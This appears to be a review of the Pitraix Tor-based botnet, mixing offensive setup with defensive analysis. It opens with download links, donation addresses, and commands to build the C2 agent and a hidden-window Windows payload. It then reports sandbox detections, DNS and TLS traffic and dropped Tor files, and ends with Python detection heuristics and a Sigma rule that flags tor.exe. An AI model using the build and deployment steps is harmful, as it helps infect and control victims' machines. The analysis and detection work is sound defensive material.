Installation
Github:
https://github.com/ThrillQuks/Pitraix [Banned by Github]
https://github.com/sinister66666/Pitraix [Banned by Github]
https://github.com/thezedwards/Pitraix [Still Alive]
Mirror:
https://anonfiles.com/V8jfY473y0/Pitraix-main_2_zip
If you find this project useful you can donate to the respective developer.
Monero: 85HjZpxZngajAEy2123NuXgu1PnNyq2DLSkkr93cyT8QQVae1GruhL4hHAtnaFqeCF7Vo9eW2P11Sig8DDqzVzCSE95NaW6
Bitcoin (segwit): bc1q2dqk9u06vv2j5p6yptj9ex7epfv77sxjygnrnw
git clone https://github.com/thezedwards/Pitraix
cd Pitraix/pitraix
go mod init pitraix
Build Agent
go build OPER.go
This produces a file named OPER, which is the Agent of the Pitraix botnet (the C2 side). On first execution it installs Tor and creates a Tor (onion) address that is used as the communication channel.
./OPER
Build Payload
Windows:
64Bit:
GOOS=windows go build -ldflags="-s -w -H=windowsgui" lyst_windows.go
32Bit:
GOOS=windows GOARCH=386 go build -ldflags="-s -w -H=windowsgui" -o lyst_windows32.exe lyst_windows.go
This produces lyst_windows.exe (or lyst_windows32.exe for the 32-bit build), which is the payload that establishes the connection between the Agent and the Target.
Linux:
Usage
The payload is executed on the target device. It then installs the Tor client and sets up persistence, so that the target computer connects over the Tor network to the Agent, which acts as the botnet C2. Below is the output of Pitraix's help command.
Review
The payload is detected as malware by Windows Defender.
On VirusTotal it is detected by 17 of 70 antivirus vendors.
When the file is executed
Task Manager
Pitraix C2 detection
Spawn shell
Shell execution
Target PC
Network Communication
DNS Resolutions
When the file under study was executed, it performed the following domain name resolutions:
apps.identrust.com
- 23.55.168.144
- 23.55.168.155
dist.torproject.org
- 116.202.120.166
- 38.229.82.35
- 116.202.120.165
- 38.229.82.25
ipinfo.io
- 34.117.59.81
TLS
www.355mg7d4j3do64vidvrmvpy2j.com
Data:
Version: TLS 1.2
Serial Number: 4b57f55ecc1d0a39
Thumbprint: 6a7f37bd7f87f0e54c6d8db9bf760a662368056e
JA3: 140e0f0cad708278ade0984528fe8493
JA3S: 0debd3853f330c574b05e0b6d882dc27
SNI: www.355mg7d4j3do64vidvrmvpy2j.com
Signature Algorithm:
Issuer: CN=www.nzla5b4t6ctmoz7s.com
Subject: CN=www.nzla5b4t6ctmoz7s.com
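The TLS summary above has the shape of a Tor link handshake rather than of a connection to a real website: the certificate is self-signed (Issuer equals Subject), its CN is a throw-away www.<label>.com name, and the SNI the client sent is a different throw-away name. The following Python is an added example, not code from the Pitraix project or from the sandbox report. It parses the "Key: value" summary as printed above and applies those four observations as a heuristic; the label alphabet and length bounds in the regular expression are an approximation assumed here, and the benign handshake is constructed for comparison.

```python
import re
from dataclasses import dataclass

# Shape of the throw-away hostnames Tor uses for its link certificates and
# client SNI ("www." + random label + ".com"/".net"). The label alphabet and
# length bounds are an approximation assumed here, not taken from the report.
WWW_RANDOM_HOST = re.compile(r"^www\.[a-z0-9]{4,25}\.(com|net)$")


@dataclass
class TlsMeta:
    version: str
    sni: str
    issuer_cn: str
    subject_cn: str
    ja3: str


def _cn(dn: str) -> str:
    """Pull the CN attribute out of a 'C=.., O=.., CN=..' distinguished name."""
    m = re.search(r"CN=([^,]+)", dn)
    return m.group(1).strip() if m else ""


def parse_tls_summary(text: str) -> TlsMeta:
    """Parse the 'Key: value' TLS summary lines as printed by the sandbox report."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return TlsMeta(
        version=fields.get("version", ""),
        sni=fields.get("sni", ""),
        issuer_cn=_cn(fields.get("issuer", "")),
        subject_cn=_cn(fields.get("subject", "")),
        ja3=fields.get("ja3", ""),
    )


def tor_link_indicators(m: TlsMeta) -> list:
    """Independent observations that together characterise a Tor link handshake."""
    reasons = []
    if m.subject_cn and m.subject_cn == m.issuer_cn:
        reasons.append("self-signed certificate (issuer == subject)")
    if WWW_RANDOM_HOST.match(m.subject_cn):
        reasons.append("certificate CN has www.<label>.com/.net shape")
    if WWW_RANDOM_HOST.match(m.sni):
        reasons.append("SNI has www.<label>.com/.net shape")
    if m.sni and m.subject_cn and m.sni != m.subject_cn:
        reasons.append("SNI does not match certificate CN")
    return reasons


def looks_like_tor(m: TlsMeta) -> bool:
    # All four must hold: a legitimate site fails the self-signed test or the
    # SNI/CN mismatch test, so a www.<word>.com name alone is not enough.
    return len(tor_link_indicators(m)) == 4


# Observed handshake, copied from the TLS section above.
OBSERVED = """\
Version: TLS 1.2
Serial Number: 4b57f55ecc1d0a39
Thumbprint: 6a7f37bd7f87f0e54c6d8db9bf760a662368056e
JA3: 140e0f0cad708278ade0984528fe8493
JA3S: 0debd3853f330c574b05e0b6d882dc27
SNI: www.355mg7d4j3do64vidvrmvpy2j.com
Signature Algorithm:
Issuer: CN=www.nzla5b4t6ctmoz7s.com
Subject: CN=www.nzla5b4t6ctmoz7s.com
"""

# Constructed benign handshake for comparison (not from the report).
BENIGN = """\
Version: TLS 1.2
SNI: www.example.com
Issuer: C=US, O=Example CA, CN=Example Public CA
Subject: CN=www.example.com
"""

if __name__ == "__main__":
    for name, text in (("observed", OBSERVED), ("benign", BENIGN)):
        meta = parse_tls_summary(text)
        print(name, "JA3", meta.ja3, "tor-like:", looks_like_tor(meta))
        for reason in tor_link_indicators(meta):
            print("   -", reason)
```

The JA3 and JA3S values are carried through because, unlike the random hostnames, they stay stable across handshakes from the same Tor build and are what a practitioner would pivot on next.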
Files Dropped
C:\Users\user\AppData\Roaming\tor\cached-certs (copy)
C:\Users\user\AppData\Roaming\tor\cached-certs.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdescs.new
C:\Users\user\AppData\Roaming\tor\state (copy)
C:\Users\user\AppData\Roaming\tor\state.tmp
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
C:\Windows\Logs\ohsDDO3Nfd1EH3UQD8sVQ1CuM
C:\Windows\security\Olwu9ixeIuV2QdazMcb.zip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip6
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname (copy)
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname.tmp
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbtorrc
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libcrypto-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_core-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_extra-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libgcc_s_seh-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssl-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssp-0.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libwinpthread-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor-gencert.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\zlib1.dll
\Device\Null
PREVENTION
With the default configuration of the Pitraix botnet, infection can be prevented by applying a rule that blocks execution of files named tor.exe, because the payload drops and launches an unmodified tor.exe (see the dropped-file list above). Note that this matches on the filename only, so an operator who renames the Tor binary evades it. The Sigma rule below is a detection rule over process-creation events; to actually block execution, the same match has to be enforced by an application-control policy.
title: Tor Client or Tor Browser Use
id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c
status: experimental
description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
references:
    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
author: frack113
date: 2022/02/20
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\tor.exe'
            - '\Tor Browser\Browser\firefox.exe'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.command_and_control
    - attack.t1090.003
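To see what the rule does and does not catch, the following Python is an added example (not code from the Pitraix project or from the Sigma project). It evaluates the rule's single `Image|endswith` selection over constructed Sysmon-style process-creation events, and adds a second, filename-independent check built from the dropped-file list above: the set of runtime DLLs the payload writes next to tor.exe. The tor.exe path and the DLL names are the ones observed above; the parent process lyst_windows.exe, the Tor Browser path, the benign Firefox and the renamed copy "update.exe" are assumptions made up for the example, and treating the DLL set as a marker for a Tor drop is an added heuristic.

```python
import ntpath
from collections import defaultdict

# The single selection of Sigma rule 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c
# (Tor Client or Tor Browser Use). Sigma string matching is case-insensitive,
# so both sides are lower-cased before the endswith comparison.
TOR_IMAGE_SUFFIXES = ("\\tor.exe", "\\tor browser\\browser\\firefox.exe")

# Runtime files the payload wrote next to tor.exe, taken from the dropped-file
# list above. Used for an added heuristic that does not depend on the
# executable's own name.
TOR_RUNTIME_FILES = {
    "libcrypto-1_1-x64.dll", "libssl-1_1-x64.dll", "libevent-2-1-7.dll",
    "libevent_core-2-1-7.dll", "libevent_extra-2-1-7.dll", "libgcc_s_seh-1.dll",
    "libssp-0.dll", "libwinpthread-1.dll", "zlib1.dll", "tor-gencert.exe",
}


def sigma_tor_rule_matches(event: dict) -> bool:
    """Evaluate 'Image|endswith' over one process_creation event."""
    image = event.get("Image", "").lower()
    return any(image.endswith(suffix) for suffix in TOR_IMAGE_SUFFIXES)


def flagged_images(process_events: list) -> list:
    """Images of all events the Sigma selection would fire on."""
    return [e["Image"] for e in process_events if sigma_tor_rule_matches(e)]


def tor_runtime_directories(file_events: list, minimum: int = 3) -> list:
    """Directories that received at least `minimum` of the Tor runtime files.

    Covers the case where tor.exe itself has been renamed, because the DLL
    set it needs is still written alongside it. Returned lower-cased.
    """
    seen = defaultdict(set)
    for e in file_events:
        directory, name = ntpath.split(e["TargetFilename"])
        if name.lower() in TOR_RUNTIME_FILES:
            seen[directory.lower()].add(name.lower())
    return sorted(d for d, names in seen.items() if len(names) >= minimum)


# Constructed Sysmon-style events. The first Image and the file paths under
# C:\Windows\security\Olwu9ixeIuV2QdazMcb are the ones observed above; the
# parent process, the Tor Browser path, the benign Firefox and the renamed
# copy "update.exe" are made up for this example.
DROP_DIR = r"C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor"
PROCESS_EVENTS = [
    {"Image": DROP_DIR + r"\tor.exe", "ParentImage": r"C:\Users\user\Desktop\lyst_windows.exe"},
    {"Image": r"C:\Users\user\Desktop\Tor Browser\Browser\firefox.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": DROP_DIR + r"\update.exe", "ParentImage": r"C:\Users\user\Desktop\lyst_windows.exe"},
]
FILE_EVENTS = [
    {"TargetFilename": DROP_DIR + r"\libcrypto-1_1-x64.dll"},
    {"TargetFilename": DROP_DIR + r"\libevent-2-1-7.dll"},
    {"TargetFilename": DROP_DIR + r"\libssl-1_1-x64.dll"},
    {"TargetFilename": DROP_DIR + r"\zlib1.dll"},
    {"TargetFilename": DROP_DIR + r"\update.exe"},
    {"TargetFilename": r"C:\Program Files\SomeApp\zlib1.dll"},  # one shared DLL alone is not enough
]

if __name__ == "__main__":
    print("Sigma rule hits:")
    for image in flagged_images(PROCESS_EVENTS):
        print("  ", image)
    print("Directories with a Tor runtime drop:")
    for directory in tor_runtime_directories(FILE_EVENTS):
        print("  ", directory)
```

The renamed copy is missed by the filename rule but its directory is still reported by the DLL-set check, which is the gap the prevention note above refers to.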